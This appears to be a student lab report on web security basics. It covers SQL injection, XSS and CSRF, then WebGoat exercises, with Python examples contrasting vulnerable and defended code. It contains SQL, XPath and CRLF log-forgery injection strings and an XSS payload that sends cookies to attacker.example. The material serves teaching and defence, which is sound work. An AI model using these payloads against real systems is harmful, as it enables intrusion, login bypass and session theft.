Part One: Answers to the basic questions
1. What is the principle of a SQL injection attack, and how is it defended against?
- A SQL injection attack tricks the server into executing malicious SQL by inserting SQL fragments into the data a web form submits, or into the query string of a domain or page request, so that the attacker's text becomes part of the statement the database runs.
- The main protection against SQL injection starts in the code:
- Use precompiled statements (PreparedStatement). As long as values are passed through its setXXX methods it is immune to SQL injection. The reason is that injected text can only do damage while the SQL statement is being prepared (parsed and compiled); a PreparedStatement is prepared before any values are bound, so in the execution phase the input is handled purely as data and is never parsed again as part of the statement;
- Filter incoming parameters with regular expressions that reject keywords characteristic of SQL injection;
- Use string filtering;
- Have the function called from the JSP check whether the input contains illegal characters, so that SQL cannot be injected through the URL.
- Note that the three filtering approaches are only secondary measures: keyword and character blacklists are routinely bypassed with comments, case changes and encoding, so parameterized queries should be the primary defense and filtering only an extra layer.
2. What is the principle of an XSS attack, and how is it defended against?
- XSS is a code injection attack: a malicious user injects code into a web page, the browser executes it, and every other user who views the page is affected. Such attacks usually involve HTML and client-side scripting languages. A common goal of XSS is to steal the target site's cookies, because a cookie is equivalent to the session: with it the attacker can log on to the site from any Internet-connected PC and act under the victim's identity.
- Defenses can be carried out in the following two ways:
- Filter parameters before a form is submitted or a URL parameter is passed;
- Check user input for illegal content such as angle brackets and quotation marks, and strictly control the output. In practice the decisive control is the second one: encode every untrusted value for the context it is inserted into (element text, attribute value, JavaScript, URL), because an input filter that only strips angle brackets does not stop a payload that needs none, such as a quote that closes an attribute and adds an event handler.
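As an added example for the two XSS defenses above (written for this page; it is not WebGoat code, and the attacker inputs and the comment template are constructed), the Python below renders an untrusted author name and comment body first through the "strip angle brackets" input filter and then through context-aware output encoding with the standard html module. The attribute payload survives the filter and becomes a live onmouseover handler; encoding turns every quote and bracket into an entity, so the same input is inert.

```python
import html

# Constructed attacker inputs used below (not taken from WebGoat):
SCRIPT_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
ATTRIBUTE_PAYLOAD = 'x" onmouseover="alert(document.cookie)'

# Assumed page fragment: the author lands in a quoted attribute, the text in element content.
TEMPLATE = '<div class="comment" data-author="{author}"><p>{text}</p></div>'


def naive_filter(value):
    """The 'strip angle brackets' input filter from the text. It defeats the
    <script> payload but does nothing to a payload that needs no brackets."""
    return value.replace("<", "").replace(">", "")


def render_filtered(author, text):
    """Input filtering only: the attribute payload closes data-author and
    becomes a new event-handler attribute in the rendered markup."""
    return TEMPLATE.format(author=naive_filter(author), text=naive_filter(text))


def encode_html(value):
    """Output encoding for element content and quoted attributes: & < > " '
    are all replaced by entities, so the value can never change the markup."""
    return html.escape(value, quote=True)


def render_encoded(author, text):
    """Output encoding at the point of insertion, whatever the input contained."""
    return TEMPLATE.format(author=encode_html(author), text=encode_html(text))


if __name__ == "__main__":
    print(render_filtered(ATTRIBUTE_PAYLOAD, SCRIPT_PAYLOAD))
    print(render_encoded(ATTRIBUTE_PAYLOAD, SCRIPT_PAYLOAD))
```

html.escape covers HTML text and quoted attributes only; a value placed inside a script block or a URL needs the encoder for that context, and marking the session cookie HttpOnly limits what a successful injection can read.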
3. What is the principle of a CSRF attack, and how is it defended against?
- As described above, XSS is a cross-site scripting attack that runs the attacker's script in the user's browser to obtain information such as cookies. CSRF instead borrows the user's identity (the browser attaches the user's cookies automatically) to send a request to the web server; because the request was not intended by the user, it is called "cross-site request forgery".
- CSRF can be defended against from several angles:
- Check the Referer, a token or a verification code on every user submission;
- Avoid exposing the user's private information in page links, and use POST rather than GET for operations that modify or delete data;
- Avoid general-purpose cookies and set the cookie domain strictly.
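The token, Referer and POST-only checks listed above, combined into one server-side gate, as an added example written for this page (not WebGoat code; the header and form dictionaries, the site origin and the session layout are assumptions standing in for whatever web framework is in use):

```python
import hmac
import secrets
from urllib.parse import urlsplit


def issue_csrf_token():
    """Fresh random token: stored in the server-side session and echoed into
    each form as a hidden field. An attacker's page cannot read it, so a forged
    cross-site request cannot include it."""
    return secrets.token_hex(32)


def origin_allowed(headers, site_origin):
    """Browsers attach Origin (or at least Referer) to cross-site POSTs.
    Require it to match our own origin; a missing header fails closed."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = "{}://{}".format(parts.scheme, parts.netloc)
    return origin == site_origin


def verify_state_change(method, headers, session, form, site_origin):
    """Accept a state-changing request only if it is a POST, comes from our own
    origin and carries the session's token. GET is refused outright so that a
    plain link or <img> tag can never trigger the action."""
    if method != "POST":
        return False
    if not origin_allowed(headers, site_origin):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(expected.encode(), supplied.encode())


if __name__ == "__main__":
    session = {"csrf_token": issue_csrf_token()}
    own = {"Origin": "https://bank.example"}
    print(verify_state_change("POST", own, session,
                              {"csrf_token": session["csrf_token"]}, "https://bank.example"))
    print(verify_state_change("POST", {"Origin": "https://evil.example"}, session,
                              {"csrf_token": session["csrf_token"]}, "https://bank.example"))
```

The Origin check alone is not enough (some clients strip the header, and a same-site XSS can still forge requests), which is why the token is still required; setting the session cookie with SameSite=Lax or Strict adds a third, browser-enforced layer.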
Part Two: Practice
1. About WebGoat
- WebGoat is a deliberately insecure web application developed by OWASP for practicing web vulnerability exploitation and illustrating security flaws in web applications. It runs on the Java virtual machine and offers many lessons, including XSS, thread safety and SQL injection; our experiments are carried out on the WebGoat platform.
- WebGoat comes in a simple version and a development version. The simple version is a single Java jar: with a Java environment installed, run it from the command line with java -jar webgoat-container-7.0.1-war-exec.jar:
- When I opened it I found it was not installed on my virtual machine, so I used the WebGoat 7.1 shared by Yang Zhenghui, put it in the home directory, and ran java -jar webgoat-server-7.1-exec.jar instead (since the downloaded version is 7.1, the version number in the command has to be changed accordingly)
- Open a browser and enter localhost:8080/webgoat
- Select the default account and password to log in successfully
2. SQL Practice
Numeric SQL Injection
- The principle: the lesson runs the SQL statement
- SELECT * FROM weather_data WHERE station = [station]
- Intercept the request and change the station field to the always-true condition 101 OR 1=1
- On Kali you can use the Firefox developer tools to edit the form field.
- This turns the original statement into: SELECT * FROM weather_data WHERE station = 101 OR 1=1
- Since 1=1 is always true, clicking Go shows the weather for every city; success.
Log Spoofing
- Log forgery: the goal is to inject a malicious string that, following the log's format, forges a log entry. Enter as the username
- zh%0d%0alogin succeeded for Username:admin
- where %0d and %0a are the URL-encoded CRLF line-break characters (carriage return and line feed). The output shows
- The second line is the one we just forged.
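To show what the log writer should have done with that username, here is an added example written for this page (not WebGoat's code; the log line format and the sanitizer are assumptions). It decodes the %0d%0a payload as the server would, shows that the verbatim log line splits into two records, and then neutralizes the control characters in two ways: escaping them visibly in a text log, and writing a structured JSON record whose fields cannot span lines.

```python
import json
from urllib.parse import unquote

# The lesson's constructed username, URL-decoded as the server sees it.
SPOOF_USERNAME = unquote("zh%0d%0alogin succeeded for username: admin")


def log_line_vulnerable(username, succeeded):
    """Writes the username verbatim. A CR LF inside it ends the real record and
    starts a second, forged one that reads like a genuine successful login."""
    outcome = "succeeded" if succeeded else "failed"
    return "login {} for username: {}".format(outcome, username)


def sanitize_log_field(value):
    """Render every control character (CR, LF, tab, escape, ...) as a visible
    \\xNN escape so one untrusted field can never span two log records."""
    return "".join(
        c if c.isprintable() else "\\x{:02x}".format(ord(c)) for c in value
    )


def log_line_sanitized(username, succeeded):
    """Text log with the untrusted field neutralized before formatting."""
    outcome = "succeeded" if succeeded else "failed"
    return "login {} for username: {}".format(outcome, sanitize_log_field(username))


def log_line_json(username, succeeded):
    """Structured logging: json.dumps escapes CR/LF inside the string and a
    consumer parses fields instead of scraping text, so there is nothing to forge."""
    return json.dumps({"event": "login", "succeeded": succeeded, "username": username})


def parse_record(line):
    """Consumer side of the JSON log: the original username comes back intact."""
    return json.loads(line)


def records(text):
    """How a line-oriented log viewer splits the file: one record per line."""
    return text.splitlines()


if __name__ == "__main__":
    for line in records(log_line_vulnerable(SPOOF_USERNAME, False)):
        print(repr(line))
    print(log_line_sanitized(SPOOF_USERNAME, False))
    print(log_line_json(SPOOF_USERNAME, False))
```

The same escaping belongs on every untrusted value that reaches a log, not just usernames; log viewers, SIEM parsers and alerting rules all trust line boundaries.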
XPath Injection
- The task: your account and password are mike/test123, and your goal is to view other employees' data.
- Again we need to construct an always-true condition, this time inside the XPath expression the login builds:
- cc' or 1=1 or 'a'='a
String SQL Injection
- String injection is similar to the numeric injection above: construct an always-true condition, for example the earlier ' or 1 = '1
- cc' OR '1'='1
- SELECT * FROM user_data WHERE last_name = 'cc' OR '1'='1'
Lab: SQL Injection, Stage 1: String SQL Injection
- Use string SQL injection to bypass authentication.
- Log in as user Neville and enter the always-true condition ' or 1=1 -- in the password field; at first the login fails, because the password field's maximum length is 8, so change its maxlength attribute to 100 and submit again.
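To tie the PreparedStatement explanation from Part One to the numeric, string and login-bypass exercises above, here is an added example written for this page (not WebGoat's code) in Python with the standard sqlite3 module. It builds an in-memory database with constructed rows in tables named after the lesson (weather_data and user_data; the column names, rows and plaintext password column are assumptions that only mirror the lesson), runs each payload against a string-concatenated query, and then runs the same input through a parameterized query. The ? placeholder binds the value after the statement has been compiled, which is exactly why the injected text is handled as data and not as SQL.

```python
import sqlite3

# Constructed sample rows standing in for WebGoat's weather_data and user_data.
WEATHER_ROWS = [(101, "Columbia"), (102, "Seattle"), (103, "New York")]
USER_ROWS = [("Neville", "Bartholomew", "secret-pass"), ("Mike", "Test", "test123")]


def make_db():
    """In-memory SQLite database with the two sample tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE weather_data (station INTEGER, name TEXT)")
    conn.execute("CREATE TABLE user_data (first_name TEXT, last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO weather_data VALUES (?, ?)", WEATHER_ROWS)
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?)", USER_ROWS)
    return conn


# --- Numeric injection (the weather lesson) ---------------------------------

def weather_vulnerable(conn, station):
    """The station value is pasted into the statement text, so the database
    parses whatever the user typed as SQL: '101 OR 1=1' matches every row."""
    sql = "SELECT station, name FROM weather_data WHERE station = " + station
    return conn.execute(sql).fetchall()


def weather_parameterized(conn, station):
    """The statement is compiled with a placeholder and the value is bound
    afterwards as data. '101 OR 1=1' is compared as an opaque string with the
    INTEGER column and matches nothing; there is no second parse in which it
    could become SQL."""
    sql = "SELECT station, name FROM weather_data WHERE station = ?"
    return conn.execute(sql, (station,)).fetchall()


# --- String injection (last_name lookup and the login bypass) ---------------

def lastname_vulnerable(conn, last_name):
    """cc' OR '1'='1 closes the quoted literal and appends an always-true clause."""
    sql = "SELECT first_name, last_name FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def login_vulnerable(conn, username, password):
    """Password ' or 1=1 -- turns the WHERE clause into
    first_name = 'Neville' AND password = '' or 1=1 --'
    The OR is always true and the -- comment swallows the trailing quote,
    so every row matches and the login 'succeeds'."""
    sql = ("SELECT first_name FROM user_data WHERE first_name = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the quote and comment are just
    characters inside the password value, which matches no stored password."""
    sql = "SELECT first_name FROM user_data WHERE first_name = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(weather_vulnerable(db, "101 OR 1=1"))              # all three stations
    print(weather_parameterized(db, "101 OR 1=1"))           # []
    print(lastname_vulnerable(db, "cc' OR '1'='1"))          # every user
    print(login_vulnerable(db, "Neville", "' or 1=1 --"))    # both users
    print(login_parameterized(db, "Neville", "' or 1=1 --"))  # []
```

The vulnerable functions are written the way the lesson's code behaves and exist only to reproduce it. Note that weather_parameterized still silently accepts a non-numeric station; in real code convert the value with int() before binding so that a malformed value is rejected outright rather than merely matching nothing.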
EXP9 Web Security Basics Practice